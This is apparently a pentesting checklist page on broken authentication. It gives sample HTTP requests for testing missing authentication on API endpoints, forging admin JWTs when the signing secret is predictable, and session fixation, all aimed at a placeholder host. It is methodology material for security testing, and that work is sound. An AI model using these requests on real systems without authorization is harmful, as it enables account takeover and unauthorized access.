Broken Authentication
Check List
Methodology
Black Box
Missing Authentication on Sensitive API Endpoint
1
2
GET /api/user/profile HTTP/1.1
Host: target.com3
4
GET /api/user/profile HTTP/1.1
Host: target.com
Authorization: Bearer randomtoken1235
6
Predictable JWT Secret
1
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.payload.signature2
{"alg":"HS256"}3
4
{"user":"admin","role":"admin"}5
Authorization: Bearer forged_admin_token6
GET /api/admin/dashboard HTTP/1.1
Host: target.com
Authorization: Bearer forged_admin_token7
8
Session Fixation via API
1
POST /api/login HTTP/1.1
Host: target.com
Content-Type: application/json
{"username":"user1","password":"Pass123"}2
Set-Cookie: session=abc123; Path=/; HttpOnly3
Cookie: session=fixedsession1234
Set-Cookie: session=fixedsession1235
GET /api/user/profile HTTP/1.1
Host: target.com
Cookie: session=fixedsession1236
7
White Box
Cheat Sheet
Last updated